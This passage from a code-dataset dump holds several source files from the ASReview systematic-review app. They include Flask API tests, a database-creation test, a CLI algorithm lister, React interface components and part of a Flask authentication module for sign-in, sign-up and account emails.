test_get_labeled_project_data(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label a random record\n au.label_random_project_data_record(client, project, 1)\n # collect labeled records\n status_code, data = au.get_labeled_project_data(client, project)\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) == 1\n\n\n# Test getting labeled records stats\ndef test_get_labeled_stats(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # collect stats\n status_code, data = au.get_labeled_project_data_stats(client, project)\n\n assert status_code == 200\n assert isinstance(data, dict)\n assert data[\"n\"] == 2\n assert data[\"n_exclusions\"] == 1\n assert data[\"n_inclusions\"] == 1\n assert data[\"n_prior\"] == 2\n\n\n# Test listing the available algorithms\ndef test_list_algorithms(setup):\n client, _, _ = setup\n status_code, data = au.get_project_algorithms_options(client)\n assert status_code == 200\n expected_keys = [\n \"balance_strategy\",\n \"classifier\",\n \"feature_extraction\",\n \"query_strategy\",\n ]\n for key in expected_keys:\n assert key in data.keys()\n assert isinstance(data[key], list)\n for item in data[key]:\n assert \"name\" in item.keys()\n assert \"label\" in item.keys()\n\n\n# Test setting the algorithms\ndef test_set_project_algorithms(setup):\n client, _, project = setup\n data = misc.choose_project_algorithms()\n status_code, data = au.set_project_algorithms(client, project, data=data)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test getting the project algorithms\ndef test_get_project_algorithms(setup):\n client, _, project = setup\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n # get the project algorithms\n status_code, resp_data = au.get_project_algorithms(client, project)\n assert status_code == 200\n assert resp_data[\"balance_strategy\"] == data[\"balance_strategy\"]\n assert 
resp_data[\"feature_extraction\"] == data[\"feature_extraction\"]\n assert resp_data[\"model\"] == data[\"model\"]\n assert resp_data[\"query_strategy\"] == data[\"query_strategy\"]\n\n\n# Test starting the model\ndef test_start_and_model_ready(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # select a model\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n # start the model\n status_code, data = au.start_project_algorithms(client, project)\n assert status_code == 200\n assert data[\"success\"]\n # make sure model is done\n time.sleep(10)\n\n\n# Test status of project\[email protected](\n (\"state_name\", \"expected_state\"),\n [\n (\"creation\", None),\n (\"setup\", \"setup\"),\n (\"review\", \"review\"),\n (\"finish\", \"finished\"),\n ],\n)\ndef test_status_project(setup, state_name, expected_state):\n client, _, project = setup\n # call these progression steps\n if state_name in [\"setup\", \"review\", \"finish\"]:\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # select a model\n data = misc.choose_project_algorithms()\n au.set_project_algorithms(client, project, data=data)\n if state_name in [\"review\", \"finish\"]:\n # start the model\n au.start_project_algorithms(client, project)\n time.sleep(15)\n if state_name == \"finish\":\n # mark project as finished\n au.set_project_status(client, project, \"finished\")\n\n status_code, data = au.get_project_status(client, project)\n assert status_code == 200\n assert data[\"status\"] == expected_state\n\n\n# Test exporting the results\[email protected](\"format\", [\"csv\", \"tsv\", \"xlsx\"])\ndef test_export_result(setup, format):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # request\n status_code, _ = au.export_project_dataset(client, project, format)\n assert status_code == 200\n\n\n# Test exporting the entire project\ndef test_export_project(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # request\n status_code, _ = au.export_project(client, project)\n assert status_code == 200\n\n\n# Test setting the project status\[email protected](\"status\", [\"review\", \"finished\"])\ndef test_set_project_status(setup, status):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # when setting the status to \"review\", the project must have another\n # status then \"review\"\n if status == \"review\":\n au.set_project_status(client, project, \"finished\")\n # set project status\n status_code, data = au.set_project_status(client, project, status)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test get progress info\ndef test_get_progress_info(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, 
data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # get progress\n status_code, data = au.get_project_progress(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert data[\"n_excluded\"] == 1\n assert data[\"n_included\"] == 1\n assert data[\"n_pool\"] == data[\"n_papers\"] - 2\n\n\n# Test get progress density on the article\ndef test_get_progress_density(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # request progress density\n status_code, data = au.get_project_progress_density(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert isinstance(data[\"relevant\"], list)\n assert isinstance(data[\"irrelevant\"], list)\n\n\n# Test progress recall\ndef test_get_progress_recall(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get recall\n status_code, data = au.get_project_progress_recall(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert isinstance(data[\"asreview\"], list)\n assert isinstance(data[\"random\"], list)\n\n\n# Test retrieve documents in order to review\ndef test_retrieve_document_for_review(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n status_code, data = au.get_project_current_document(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert not data[\"pool_empty\"]\n assert isinstance(data[\"result\"], dict)\n assert isinstance(data[\"result\"][\"doc_id\"], int)\n\n\n# Test label a document after the model has been started\ndef test_label_a_document_with_running_model(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n _, data = au.get_project_current_document(client, project)\n # get id\n doc_id = data[\"result\"][\"doc_id\"]\n # label it\n status_code, data = au.label_project_record(\n client, project, doc_id, label=1, prior=0, note=\"note\"\n )\n assert status_code == 200\n assert data[\"success\"]\n time.sleep(10)\n\n\n# Test update label of a document after the model has been started\ndef test_update_label_of_document_with_running_model(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n _, data = au.get_project_current_document(client, project)\n # get id\n doc_id = data[\"result\"][\"doc_id\"]\n # label it\n au.label_project_record(client, project, doc_id, label=1, prior=0, note=\"note\")\n # change label\n status_code, data = au.update_label_project_record(\n client, project, doc_id, label=0, prior=0, note=\"changed note\"\n )\n assert status_code == 200\n assert data[\"success\"]\n time.sleep(10)\n\n\n# Test deleting a project\ndef test_delete_project(setup):\n client, _, project = setup\n # delete project\n status_code, data = au.delete_project(client, project)\n assert status_code == 200\n assert data[\"success\"]\n\n\[email protected](\n \"api_call\",\n [\n au.get_all_projects,\n au.create_project,\n au.create_project_from_dict,\n au.update_project,\n au.upgrade_project,\n au.get_project_stats,\n au.get_demo_data,\n au.upload_data_to_project,\n au.get_project_data,\n 
au.get_project_dataset_writer,\n au.search_project_data,\n au.get_prior_random_project_data,\n au.label_project_record,\n au.update_label_project_record,\n au.get_labeled_project_data,\n au.get_labeled_project_data_stats,\n au.get_project_algorithms_options,\n au.set_project_algorithms,\n au.get_project_algorithms,\n au.start_project_algorithms,\n au.get_project_status,\n au.set_project_status,\n au.export_project_dataset,\n au.export_project,\n au.get_project_progress,\n au.get_project_progress_density,\n au.get_project_progress_recall,\n au.get_project_current_document,\n au.delete_project,\n ],\n)\ndef test_unauthorized_use_of_api_calls(setup, api_call):\n client, user, project = setup\n if current_app_is_authenticated():\n # signout the client\n au.signout_user(client)\n # inspect function\n sig = inspect.signature(api_call)\n # form parameters\n parms = []\n for par in sig.parameters.keys():\n annotation = sig.parameters[par].annotation\n if annotation == FlaskClient:\n parms.append(client)\n elif annotation == Union[Project, ASReviewProject]:\n parms.append(project)\n elif annotation == int:\n parms.append(1)\n elif annotation == str:\n parms.append(\"abc\")\n elif annotation == dict:\n parms.append({})\n\n # make the api call\n status_code, data = api_call(*parms)\n assert status_code == 401\n assert data[\"message\"] == \"Login required.\"\n else:\n # no asserts in an unauthenticated app\n pass\n" }, { "alpha_fraction": 0.7362534999847412, "alphanum_fraction": 0.7362534999847412, "avg_line_length": 28.80555534362793, "blob_id": "1d8a69dad6d053320c9bc670c57990a357ba6947", "content_id": "5787320157445a62917966bdd37a8e857170704d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1073, "license_type": "permissive", "max_line_length": 81, "num_lines": 36, "path": "/asreview/webapp/tests/test_database_and_models/test_database_creation.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# GOAL: test database creation if app is started with authentication\nfrom pathlib import Path\n\nimport pytest\nimport sqlalchemy\nfrom sqlalchemy import create_engine\n\nfrom asreview.utils import asreview_path\n\n\ndef get_db_path():\n return Path(asreview_path() / \"asreview.test.sqlite\")\n\n\n# checks if asreview path does not contain a database if app\n# is unauthenticated\ndef test_database_is_not_created_if_unauth_app(unauth_app):\n assert Path(asreview_path()).exists()\n assert get_db_path().exists() is False\n\n\n# checks is asreview path contains database if app is\n# authenticated\ndef test_database_exists_after_starting_auth_app(auth_app):\n assert Path(asreview_path()).exists()\n assert get_db_path().exists()\n\n\n# checks if all tables were created\[email protected](\n \"table\", [\"collaboration_invitations\", \"collaborations\", \"projects\", \"users\"]\n)\ndef test_if_db_table_exists(auth_app, table):\n engine = create_engine(f\"sqlite:///{str(get_db_path())}\")\n table_names = sqlalchemy.inspect(engine).get_table_names()\n assert table in table_names\n" }, { "alpha_fraction": 0.6291581392288208, "alphanum_fraction": 0.6373716592788696, "avg_line_length": 30.623376846313477, "blob_id": "1cc6d54b8e4c04bdb9de5dd3e73d11437ea26fdf", "content_id": "31b47aa74d25b7382007ec6004a100843269affd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2435, "license_type": "permissive", "max_line_length": 80, "num_lines": 77, "path": 
"/asreview/entry_points/algorithms.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models.balance import list_balance_strategies\nfrom asreview.models.classifiers import list_classifiers\nfrom asreview.models.feature_extraction import list_feature_extraction\nfrom asreview.models.query import list_query_strategies\n\n\ndef _format_algorithm(values, name, description):\n s = f\" {name: <20}Available {description}:\\n\\n\"\n\n result = []\n\n for x in values:\n if hasattr(x, \"label\"):\n result.append(\n \" \" * 22 + f\"{x.name}\" + \" \" * (16 - len(x.name)) + f\"{x.label}\"\n )\n else:\n result.append(\" \" * 22 + f\"{x.name}\")\n\n s += \"\\n\".join(result)\n s += \"\\n\\n\"\n\n return s\n\n\nclass AlgorithmsEntryPoint(BaseEntryPoint):\n \"\"\"Entry point to list available algorithms in ASReview LAB.\"\"\"\n\n description = \"Available active learning algorithms for ASReview.\"\n\n def execute(self, argv):\n s = \"Available active learning algorithms for ASReview. \\n\\n\"\n\n # feature_extraction\n s += _format_algorithm(\n values=list_feature_extraction(),\n name=\"feature_extraction\",\n description=\"feature extraction algorithms\",\n )\n\n # classifiers\n s += _format_algorithm(\n values=list_classifiers(),\n name=\"classifiers\",\n description=\"classification algorithms\",\n )\n\n # query_strategies\n s += _format_algorithm(\n values=list_query_strategies(),\n name=\"query_strategies\",\n description=\"query strategies\",\n )\n\n # balance_strategies\n s += _format_algorithm(\n values=list_balance_strategies(),\n name=\"balance_strategies\",\n description=\"balance strategies\",\n )\n\n print(s)\n" }, { "alpha_fraction": 0.5499283075332642, "alphanum_fraction": 0.5537505745887756, "avg_line_length": 24.839506149291992, "blob_id": "c500a730e31c6f3e09973cc33703b157c0832be5", "content_id": "96c855338de5089b181bbd3cc31db92268d793f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2093, "license_type": "permissive", "max_line_length": 76, "num_lines": 81, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/Filter.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Autocomplete, IconButton, InputBase, Popper } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { FilterList } from \"@mui/icons-material\";\n\nimport { historyFilterOptions } from \"../../globals.js\";\n\nconst PREFIX = \"Filter\";\n\nconst classes = {\n icon: `${PREFIX}-icon`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n padding: \"4px 16px\",\n [`& .${classes.icon}`]: {\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n },\n}));\n\nexport default function 
Filter(props) {\n const filterInput = React.useRef(null);\n\n const customPopper = (props) => {\n return (\n <Popper {...props} style={{ width: 160 }} placement=\"bottom-start\" />\n );\n };\n\n const onClickFilter = () => {\n filterInput.current.focus();\n };\n\n return (\n <Root>\n <IconButton className={classes.icon} onClick={onClickFilter}>\n <FilterList fontSize={!props.mobileScreen ? \"medium\" : \"small\"} />\n </IconButton>\n <Autocomplete\n id=\"filter labeled record\"\n sx={{ ml: 1, flex: 1, display: \"flex\" }}\n blurOnSelect\n disableClearable\n freeSolo\n filterSelectedOptions\n multiple\n openOnFocus\n options={historyFilterOptions}\n getOptionLabel={(option) => option.label}\n PopperComponent={customPopper}\n renderInput={(params) => {\n const { InputLabelProps, InputProps, ...rest } = params;\n return (\n <InputBase\n {...params.InputProps}\n {...rest}\n inputRef={filterInput}\n placeholder={!props.filterQuery.length ? \"Filter\" : \"\"}\n readOnly\n />\n );\n }}\n onChange={(event, value) => {\n props.setFilterQuery(value);\n }}\n value={props.filterQuery}\n />\n {/*\n <Tooltip title=\"Remove filter\">\n <IconButton className={classes.icon}>\n <Close />\n </IconButton>\n </Tooltip>\n */}\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.5222734212875366, "alphanum_fraction": 0.5299538969993591, "avg_line_length": 28.590909957885742, "blob_id": "a790013a1bd9c7f33f4e5c025905ef4e187b0e3d", "content_id": "9675e3bd69065b003d8c619c8141b8023417170c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1302, "license_type": "permissive", "max_line_length": 81, "num_lines": 44, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ExplorationModeBanner.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Banner } from \"material-ui-banner\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nconst ExplorationModeBanner = (props) => {\n return (\n <div aria-label=\"exploration mode banner\">\n <Banner\n open={props.explorationMode}\n onClose={() => props.setExplorationMode(false)}\n label=\"You are reviewing a completely labeled dataset.\"\n icon={<InfoOutlinedIcon sx={{ color: \"text.secondary\" }} />}\n iconProps={{\n sx: { bgcolor: \"transparent\" },\n }}\n buttonLabel=\"Learn more\"\n buttonProps={{\n href: \"https://asreview.readthedocs.io/en/latest/lab/exploration.html\",\n target: \"_blank\",\n sx: { color: \"text.secondary\" },\n }}\n dismissButtonLabel=\"Got it\"\n dismissButtonProps={{\n sx: { color: \"text.secondary\" },\n }}\n paperProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n cardProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? 
\"grey.900\" : \"grey.50\",\n },\n }}\n appBar\n />\n </div>\n );\n};\n\nexport default ExplorationModeBanner;\n" }, { "alpha_fraction": 0.5880758762359619, "alphanum_fraction": 0.5880758762359619, "avg_line_length": 20.705883026123047, "blob_id": "05949de730695d025b73e2d5be4b6653d05ffa9e", "content_id": "f3feb152b66310ba556227ae80579a86139d1119", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 369, "license_type": "permissive", "max_line_length": 48, "num_lines": 17, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/DashboardPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst DashboardPage = (props) => {\n return (\n <Root aria-label=\"projects page\">\n <Fade in>\n <Box>{props.children}</Box>\n </Fade>\n </Root>\n );\n};\n\nexport default DashboardPage;\n" }, { "alpha_fraction": 0.5699096322059631, "alphanum_fraction": 0.5699096322059631, "avg_line_length": 29.338708877563477, "blob_id": "730d7287305fa70dba402a467fe3bfc1fc456d10", "content_id": "0187d6953bfa6dcaed92c63b0b6677a5b60b206d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1881, "license_type": "permissive", "max_line_length": 114, "num_lines": 62, "path": "/asreview/webapp/src/ProjectComponents/ProjectModeSelect.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {\n FormControl,\n FormHelperText,\n InputLabel,\n MenuItem,\n Select,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { SelectItem } from \"../ProjectComponents\";\nimport { projectModes } from \"../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nexport default function ProjectModeSelect(props) {\n return (\n <Root>\n <FormControl\n disabled={props.disableModeSelect}\n fullWidth\n variant={!props.disableModeSelect ? 
\"outlined\" : \"filled\"}\n >\n <InputLabel id=\"mode-select-label\">Mode</InputLabel>\n <Select\n labelId=\"mode-select-label\"\n id=\"mode-select\"\n inputProps={{\n onFocus: () => props.onFocus(),\n onBlur: () => props.onBlur(),\n }}\n name=\"mode\"\n label=\"Mode\"\n value={props.mode}\n onChange={props.handleMode}\n >\n <MenuItem value={projectModes.ORACLE} divider>\n <SelectItem\n primary=\"Oracle\"\n secondary=\"Review your dataset with interactive artificial intelligence (AI)\"\n />\n </MenuItem>\n <MenuItem value={projectModes.EXPLORATION} divider>\n <SelectItem\n primary=\"Exploration\"\n secondary=\"Explore or demonstrate ASReview LAB with a completely labeled dataset\"\n />\n </MenuItem>\n <MenuItem value={projectModes.SIMULATION}>\n <SelectItem\n primary=\"Simulation\"\n secondary=\"Simulate a review on a completely labeled dataset to see the performance of ASReview LAB\"\n />\n </MenuItem>\n </Select>\n {props.datasetAdded && (\n <FormHelperText>Editing mode removes the added data</FormHelperText>\n )}\n </FormControl>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.5662159323692322, "alphanum_fraction": 0.5666452050209045, "avg_line_length": 28.118749618530273, "blob_id": "ad4afe268435c7e1c4670d955463f3dcef3870a2", "content_id": "ac600b65990bffce032f943b8149496acdc2a767", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4659, "license_type": "permissive", "max_line_length": 88, "num_lines": 160, "path": "/asreview/webapp/src/ProjectComponents/ProjectDeleteDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useSelector, useDispatch } from \"react-redux\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport {\n Alert,\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogTitle,\n Stack,\n Typography,\n TextField,\n} from \"@mui/material\";\nimport { TeamAPI, ProjectAPI } from \"../api/index.js\";\nimport { setMyProjects } from \"../redux/actions\";\nimport useAuth from \"../hooks/useAuth\";\n\nconst ProjectDeleteDialog = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const { auth } = useAuth();\n const authenticated = useSelector((state) => state.authentication);\n const dispatch = useDispatch();\n\n const descriptionElementRef = React.useRef(null);\n const [deleteInput, setDeleteInput] = React.useState(\"\");\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateDeleteProject,\n {\n onSuccess: () => {\n if (!project_id) {\n queryClient.invalidateQueries(\"fetchProjects\");\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n props.toggleDeleteDialog();\n } else {\n navigate(\"/projects\");\n }\n },\n },\n );\n\n const endCollaboration = () => {\n if (authenticated && props.project_id && auth.id) {\n TeamAPI.endCollaboration(props.project_id, auth.id)\n .then((data) => {\n if (data.success) {\n // success, the collaboration was ended, get all projects\n ProjectAPI.fetchProjects({})\n .then((data) => {\n if (data.result instanceof Array) {\n // refresh project list\n dispatch(setMyProjects(data.result));\n // close dialog\n props.toggleDeleteDialog();\n } else {\n console.log(\"Could not get projects list -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not pull all projects\", err));\n } else {\n 
console.log(\"Could not end collaboration -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not end collaboration\", err));\n }\n };\n\n const onChangeTitle = (event) => {\n if (isError) {\n reset();\n }\n setDeleteInput(event.target.value);\n };\n\n const cancelDelete = () => {\n props.toggleDeleteDialog();\n reset();\n };\n\n const disableConfirmButton = () => {\n return deleteInput !== props.projectTitle || isLoading;\n };\n\n React.useEffect(() => {\n if (props.onDeleteDialog) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [props.onDeleteDialog]);\n\n const warningSuffix = () => {\n // which project are we talking about?\n if (props.isOwner) {\n return \", including the dataset, review history, notes, and model configuration.\";\n } else {\n return \" from your list\";\n }\n };\n\n return (\n <Dialog\n open={props.onDeleteDialog}\n onClose={cancelDelete}\n scroll=\"paper\"\n fullWidth\n maxWidth=\"sm\"\n >\n <DialogTitle>Permanently delete this project?</DialogTitle>\n <DialogContent dividers>\n <Stack spacing={3}>\n {isError && <Alert severity=\"error\">{error[\"message\"]}</Alert>}\n <Stack spacing={2}>\n <Typography>\n This action <b>cannot</b> be undone. This will permanently delete\n the <b>{props.projectTitle}</b> project{warningSuffix()}\n </Typography>\n <Typography>\n Please type <b>{props.projectTitle}</b> to confirm.\n </Typography>\n </Stack>\n <TextField\n autoComplete=\"off\"\n autoFocus\n fullWidth\n required\n name=\"project-title\"\n id=\"project-title\"\n label=\"Title\"\n onChange={onChangeTitle}\n />\n </Stack>\n </DialogContent>\n <DialogActions>\n <Button onClick={cancelDelete}>Cancel</Button>\n {props.isOwner && (\n <Button\n onClick={() => mutate({ project_id: props.project_id })}\n disabled={disableConfirmButton()}\n >\n Delete Forever\n </Button>\n )}\n {!props.isOwner && (\n <Button onClick={endCollaboration} disabled={disableConfirmButton()}>\n Delete\n </Button>\n )}\n </DialogActions>\n </Dialog>\n );\n};\n\nexport default ProjectDeleteDialog;\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 53, "blob_id": "123c4fa2e4635abe95d23662b79dbe9760fd1e2a", "content_id": "c06671edc4ca524c2a7047aa2c1d7a16874b0b77", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 216, "license_type": "permissive", "max_line_length": 57, "num_lines": 4, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as DataForm } from \"./DataForm\";\nexport { default as DataFormCard } from \"./DataFormCard\";\nexport { default as DetailsPage } from \"./DetailsPage\";\nexport { default as ModelForm } from \"./ModelForm\";\n" }, { "alpha_fraction": 0.5526171922683716, "alphanum_fraction": 0.5605398416519165, "avg_line_length": 35.24158477783203, "blob_id": "16449b1036b8381c632b2e64d57268d0578d0a18", "content_id": "e948d3511639669b4f01e48f065eeca529d2e305", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18302, "license_type": "permissive", "max_line_length": 88, "num_lines": 505, "path": "/asreview/webapp/api/auth.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport datetime as dt\nfrom pathlib import Path\n\nfrom flask import Blueprint\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import render_template_string\nfrom flask import request\nfrom flask_login import current_user\nfrom flask_login import login_user\nfrom flask_login import logout_user\nfrom flask_mail import Mail\nfrom flask_mail import Message\nfrom sqlalchemy import and_\nfrom sqlalchemy import or_\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.models import User\nfrom asreview.webapp.authentication.oauth_handler import OAuthHandler\n\nbp = Blueprint(\"auth\", __name__, url_prefix=\"/auth\")\n\n\ndef perform_login_user(user):\n \"\"\"Helper function to login a user\"\"\"\n return login_user(user, remember=True, duration=dt.timedelta(days=31))\n\n\n# TODO: not sure if this file is the right place for this function\ndef send_forgot_password_email(user, request, cur_app):\n # do not send email in test environment\n if not cur_app.testing:\n # get necessary information out of user object\n name = user.name or \"ASReview user\"\n # email config\n config = cur_app.config.get(\"EMAIL_CONFIG\")\n # get url of front-end\n root_url = request.headers.get(\"Origin\")\n # create url that will be used in the email\n url = f\"{root_url}/reset_password?user_id={user.id}&token={user.token}\"\n # create a mailer\n mailer = Mail(cur_app)\n # open templates as string and render\n root_path = Path(cur_app.root_path)\n with open(root_path / \"templates/emails/forgot_password.html\", \"r\") as f:\n html_text = render_template_string(f.read(), name=name, url=url)\n with open(root_path / \"templates/emails/forgot_password.txt\", \"r\") as f:\n txt_text = render_template_string(f.read(), name=name, url=url)\n # create message\n msg = Message(\n \"ASReview: forgot password\",\n recipients=[user.email],\n sender=config.get(\"REPLY_ADDRESS\"),\n )\n msg.body = txt_text\n msg.html = html_text\n return mailer.send(msg)\n\n\n# TODO: not sure if this file is the right place for this function\ndef send_confirm_account_email(user, request, cur_app):\n # do not send email in test environment\n if not cur_app.testing:\n # get necessary information out of user object\n name = user.name or \"ASReview user\"\n # email config\n config = cur_app.config.get(\"EMAIL_CONFIG\")\n # get url of front-end\n root_url = request.headers.get(\"Origin\")\n # create url that will be used in the email\n url = f\"{root_url}/confirm_account?user_id={user.id}&token={user.token}\"\n # create a mailer\n mailer = Mail(cur_app)\n # open templates as string and render\n root_path = Path(cur_app.root_path)\n with open(root_path / \"templates/emails/confirm_account.html\", \"r\") as f:\n html_text = render_template_string(f.read(), name=name, url=url)\n with 
open(root_path / \"templates/emails/confirm_account.txt\", \"r\") as f:\n txt_text = render_template_string(f.read(), name=name, url=url)\n # create message\n msg = Message(\n \"ASReview: please confirm your account\",\n recipients=[user.email],\n sender=config.get(\"REPLY_ADDRESS\"),\n )\n msg.body = txt_text\n msg.html = html_text\n return mailer.send(msg)\n\n\n# ------------------\n# ROUTES\n# ------------------\n\n\[email protected](\"/signin\", methods=[\"POST\"])\ndef signin():\n email = request.form.get(\"email\").strip()\n password = request.form.get(\"password\", \"\")\n\n # get the user\n user = User.query.filter(\n or_(User.identifier == email, User.email == email)\n ).one_or_none()\n\n if not user:\n # user does not exsist\n result = (404, {\"message\": f\"User account {email} does not exist.\"})\n elif not user.confirmed:\n # account is not confirmed\n result = (404, {\"message\": f\"User account {email} is not confirmed.\"})\n else:\n # user exists and is confirmed: verify password\n if user.verify_password(password):\n logged_in = perform_login_user(user)\n result = (\n 200,\n {\n \"logged_in\": logged_in,\n \"name\": user.get_name(),\n \"id\": user.id,\n \"message\": f\"User {user.identifier} is logged in.\"\n },\n )\n else:\n # password is wrong\n if user.origin == \"asreview\":\n # if this is an asreview user\n result = (404, {\"message\": f\"Incorrect password for user {email}.\"})\n else:\n # this must be an OAuth user trying to get in with\n # a password\n service = user.origin.capitalize()\n result = (404, {\"message\": f\"Please login with the {service} service.\"})\n\n status, message = result\n response = jsonify(message)\n return response, status\n\n\[email protected](\"/signup\", methods=[\"POST\"])\ndef signup():\n # Can we create accounts?\n if current_app.config.get(\"ALLOW_ACCOUNT_CREATION\", False):\n email = request.form.get(\"email\", \"\").strip()\n name = request.form.get(\"name\", \"\").strip()\n affiliation = request.form.get(\"affiliation\", \"\").strip()\n password = 